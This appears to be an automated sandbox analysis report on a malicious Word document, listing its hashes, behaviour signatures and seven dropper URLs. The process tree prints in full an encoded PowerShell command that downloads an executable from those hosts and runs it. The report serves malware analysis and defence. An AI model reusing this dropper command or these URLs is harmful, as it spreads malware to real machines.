Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    22-05-2024 23:38

General

  • Target

    690561df86e4ee7cb5a048fb1d680c5b_JaffaCakes118.doc

  • Size

    201KB

  • MD5

    690561df86e4ee7cb5a048fb1d680c5b

  • SHA1

    5cc43634a5c614eac6f46f1eb2b5034541045a8f

  • SHA256

    98632e96b70d38ce6029a1216a0bac4b571db57e8cdc5c727fcbb67eb88cc439

  • SHA512

    7355a9e12ffcf95121c62524fc1eefb2475fca98d574899f6032e392e52183467dc1b633245223dad064b87b766e854c1a841edd54c3df44f5df4f8497887d54

  • SSDEEP

    1536:44tcTv8kvjEuJ0dH5L0c4vs3ti18NmIIP4ovlnoR+a9ssfxO5dq78ct2PU7MXKSd:44tcTvjvTY140818tIP4ovpcGqfsJj

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://veccino56.com/gjpra/4ZR/

exe.dropper

http://girlgeekdinners.com/wp-content/Hpz/

exe.dropper

http://marblingmagpie.com/COPYRIGHT/Ak/

exe.dropper

http://aplicativoipok.net/wp-includes/ONW/

exe.dropper

http://ec2-52-56-233-157.eu-west-2.compute.amazonaws.com/wp-includes/35/

exe.dropper

https://shd7.life/mlktv/r6/

exe.dropper

https://www.hairlineunisexsalon.com/demo/UX/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\690561df86e4ee7cb5a048fb1d680c5b_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2316
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2756
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -encod JABLAF8ANwA4AGsAZABzAD0AKAAnAFcAJwArACgAJwBsAGUAJwArACcAcwBqACcAKQArACcAZwBwACcAKQA7ACYAKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEUAbgB2ADoAVQBzAEUAcgBwAHIATwBmAEkAbABFAFwAQwBLAHoAVABrAHkASABcAHoAYgBJADEATABWAHoAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABJAFIARQBjAHQAbwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBjAFUAYABSAGkAdAB5AFAAcgBgAE8AdABvAEMAYABPAGwAIgAgAD0AIAAoACgAJwB0ACcAKwAnAGwAcwAxADIALAAnACkAKwAnACAAJwArACcAdABsACcAKwAoACcAcwAxADEALAAgACcAKwAnAHQAJwApACsAJwBsAHMAJwApADsAJABWAGcAcABhADEAYwBlACAAPQAgACgAKAAnAFgAXwAnACsAJwA0ACcAKQArACgAJwB6ACcAKwAnAHQAYwBxACcAKQArACcAeAAnACkAOwAkAE8AeQBlAGsAXwBlAGoAPQAoACcASwB3ACcAKwAoACcAMQAnACsAJwBnAGgAcABhACcAKQApADsAJABIADAAZQB4AGcAcwAxAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAG8ARAAnACsAKAAnADkAQwBrAHoAdAAnACsAJwBrAHkAaABvACcAKwAnAEQAOQAnACkAKwAnAFoAYgAnACsAKAAnAGkAJwArACcAMQBsACcAKQArACcAdgAnACsAJwB6AG8AJwArACcARAA5ACcAKQAgAC0AQwByAGUAUABsAEEAYwBFACAAIAAoACcAbwBEACcAKwAnADkAJwApACwAWwBDAEgAYQBSAF0AOQAyACkAKwAkAFYAZwBwAGEAMQBjAGUAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABUAHkAMAB1ADEAbAA0AD0AKAAnAFAAJwArACgAJwA1AG0AJwArACcANABfAHMAbQAnACkAKQA7ACQARgBfADEAZwA3AG8AMQA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAZQAnACsAJwBjAHQAJwApACAATgBlAFQALgB3AEUAQgBDAEwAaQBlAG4AVAA7ACQASwB2ADIAMAB5AHkAaAA9ACgAJwBoACcAKwAoACcAdAB0AHAAOgAnACsAJwAvAC8AJwApACsAJwB2ACcAKwAnAGUAYwAnACsAKAAnAGMAaQAnACsAJwBuAG8AJwApACsAKAAnADUANgAuAGMAbwBtACcAKwAnAC8AJwArACcAZwAnACkAKwAoACcAagAnACsAJwBwAHIAYQAvACcAKQArACgAJwA0ACcAKwAnAFoAJwArACcAUgAvACoAaAB0ACcAKQArACgAJwB0AHAAJwArACcAOgAvACcAKQArACgAJwAvACcAKwAnAGcAaQAnACkAKwAoACcAcgAnACsAJwBsAGcAZQBlAGsAZABpAG4AJwArACcAbgBlAHIAJwApACsAKAAnAHMALgAnACsAJwBjACcAKQArACgAJwBvAG0ALwAnACsAJwB3AHAALQAnACkAKwAnAGMAJwArACgAJwBvACcAKwAnAG4AdABlACcAKQArACgAJwBuAHQALwAnACsAJwBIAHAAJwApACsAJwB6ACcAKwAnAC8AKgAnACsAJwBoACcAKwAoACcAdAB0AHAAJwArACcAOgAvACcAKwAnAC8AbQAnACkAKwAoACcAYQAnACsAJwByAGIAbAAnACkAKwAoACcAaQAnACsAJwBuAGcAbQBhACcAKQArACcAZwBwACcAKwAnAGkAJwArACgAJwBlAC4AYwAnACsAJwBvAG0ALwBDACcAKQArACgAJwBPAFAAWQAnACsAJwBSACcAKQArACgAJwBJAEcAJwArACcASABUACcAKwAnAC8AQQBrACcAKQArACgAJwAvACcAKwAnACoAaAAnACkAKwAnAHQAJwArACgAJwB0ACcAKwAnAHAAOgAnACkAKwAnAC8ALwAnACsAJwBhACcAKwAnAHAAJwArACcAbAAnACsAKAAnAGkAJwArACcAYwBhAHQAaQAnACkAKwAoACcAdgAnACsAJwBvAGkAcAAnACkAKwAoACcAbwBrAC4AbgAnACsAJwBlAHQAJwApACsAJwAvACcAKwAnAHcAcAAnACsAKAAnAC0AJwArACcAaQBuACcAKwAnAGMAbAB1AGQAZQBzACcAKQArACgAJwAvACcAKwAnAE8AJwArACcATgBXAC8AKgBoACcAKQArACgAJwB0AHQAcAA6AC8ALwBlACcAKwAnAGMAJwArACcAMgAtADUAJwApACsAJwAyAC0AJwArACgAJwA1ADYALQAnACsAJwAyADMAJwArACcAMwAtADEAJwApACsAJwA1ACcAKwAoACcANwAuACcAKwAnAGUAdQAtACcAKwAnAHcAZQAnACkAKwAnAHMAJwArACcAdAAtACcAKwAnADIALgAnACsAKAAnAGMAbwAnACsAJwBtAHAAJwApACsAJwB1ACcAKwAnAHQAZQAnACsAKAAnAC4AYQBtACcAKwAnAGEAegAnACkAKwAoACcAbwAnACsAJwBuAGEAJwApACsAKAAnAHcAcwAnACsAJwAuACcAKQArACgAJwBjAG8AbQAnACsAJwAvAHcAcAAtAGkAJwArACcAbgAnACkAKwAnAGMAJwArACcAbAB1ACcAKwAoACcAZAAnACsAJwBlAHMAJwApACsAJwAvACcAKwAnADMANQAnACsAKAAnAC8AJwArACcAKgBoAHQAJwArACcAdABwACcAKQArACcAcwA6ACcAKwAnAC8ALwAnACsAKAAnAHMAJwArACcAaABkACcAKQArACgAJwA3ACcAKwAnAC4AbABpAGYAJwApACsAJwBlACcAKwAnAC8AbQAnACsAKAAnAGwAJwArACcAawB0ACcAKQArACcAdgAnACsAJwAvAHIAJwArACcANgAvACcAKwAoACcAKgBoAHQAdABwACcAKwAnAHMAJwApACsAJwA6ACcAKwAoACcALwAvAHcAJwArACcAdwB3AC4AJwArACcAaAAnACkAKwAoACcAYQBpACcAKwAnAHIAJwApACsAJwBsACcAKwAoACcAaQBuACcAKwAnAGUAJwApACsAJwB1AG4AJwArACgAJwBpACcAKwAnAHMAZQB4ACcAKQArACcAcwAnACsAKAAnAGEAJwArACcAbAAnACsAJwBvAG4ALgAnACsAJwBjAG8AbQAvACcAKQArACgAJwBkAGUAJwArACcAbQBvACcAKQArACcALwAnACsAJwBVACcAKwAnAFgALwAnACkALgAiAFMAcABMAGAAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQARwBnADIAcABvAHgAOAA9ACgAKAAnAFcAYQA1AHYAMQAnACsAJwBxACcAKQArACcAegAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABSAGEAegA3ADAAaAB2ACAAaQBuACAAJABLAHYAMgAwAHkAeQBoACkAewB0AHIAeQB7ACQARgBfADEAZwA3AG8AMQAuACIARABvAHcAbgBMAE8AYABBAGAARABgAEYASQBMAGUAIgAoACQAUgBhAHoANwAwAGgAdgAsACAAJABIADAAZQB4AGcAcwAxACkAOwAkAFUAOAAyAG8AcwBkAGIAPQAoACgAJwBXAHIAJwArACcAegBmADMAJwApACsAJwByAHMAJwApADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAEgAMABlAHgAZwBzADEAKQAuACIATABlAE4AYABnAHQASAAiACAALQBnAGUAIAAzADgANAAzADcAKQAgAHsALgAoACcASQBuACcAKwAnAHYAJwArACcAbwBrAGUALQBJAHQAJwArACcAZQBtACcAKQAoACQASAAwAGUAeABnAHMAMQApADsAJABFADgAYgB6AHYAbwBlAD0AKAAnAFQAJwArACcAeQAxACcAKwAoACcAcgBpADkAJwArACcAZgAnACkAKQA7AGIAcgBlAGEAawA7ACQAVQBfAGMAMgA5AGIAZwA9ACgAJwBNACcAKwAoACcAdQAnACsAJwA4ADAAMwBxACcAKwAnAG8AJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFgAbAB0AHQAeAA2AGgAPQAoACcAUQB5ACcAKwAoACcAMgAnACsAJwBwAGwAMwB4ACcAKQApAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2996

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      0aafcb450df9217ce615e616c87baf0e

      SHA1

      4de23358fc22229b8f2d6019fadebe4615a9643e

      SHA256

      ab1cc2cc87a9b8bbea2f79e9662058944dc284ec30feec4c500fdfed32808e25

      SHA512

      b13092ca4864716de5d2842de89e44d16619f000da37d54acaddfd224afaf3640addc0807ca48bf7903a7671c44fb6fedc82db581666ffa2a22e9b5f6f2c6ecb

    • memory/2316-33-0x0000000005CC0000-0x0000000005DC0000-memory.dmp

      Filesize

      1024KB

    • memory/2316-22-0x0000000005CC0000-0x0000000005DC0000-memory.dmp

      Filesize

      1024KB

    • memory/2316-66-0x0000000070C5D000-0x0000000070C68000-memory.dmp

      Filesize

      44KB

    • memory/2316-17-0x0000000005CC0000-0x0000000005DC0000-memory.dmp

      Filesize

      1024KB

    • memory/2316-65-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2316-31-0x0000000005CC0000-0x0000000005DC0000-memory.dmp

      Filesize

      1024KB

    • memory/2316-32-0x0000000005CC0000-0x0000000005DC0000-memory.dmp

      Filesize

      1024KB

    • memory/2316-45-0x0000000070C5D000-0x0000000070C68000-memory.dmp

      Filesize

      44KB

    • memory/2316-7-0x0000000005CC0000-0x0000000005DC0000-memory.dmp

      Filesize

      1024KB

    • memory/2316-2-0x0000000070C5D000-0x0000000070C68000-memory.dmp

      Filesize

      44KB

    • memory/2316-0-0x000000002F711000-0x000000002F712000-memory.dmp

      Filesize

      4KB

    • memory/2316-47-0x0000000005CC0000-0x0000000005DC0000-memory.dmp

      Filesize

      1024KB

    • memory/2316-48-0x0000000005F10000-0x0000000006010000-memory.dmp

      Filesize

      1024KB

    • memory/2316-49-0x0000000005CC0000-0x0000000005DC0000-memory.dmp

      Filesize

      1024KB

    • memory/2316-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2996-40-0x00000000027E0000-0x00000000027E8000-memory.dmp

      Filesize

      32KB

    • memory/2996-39-0x000000001B620000-0x000000001B902000-memory.dmp

      Filesize

      2.9MB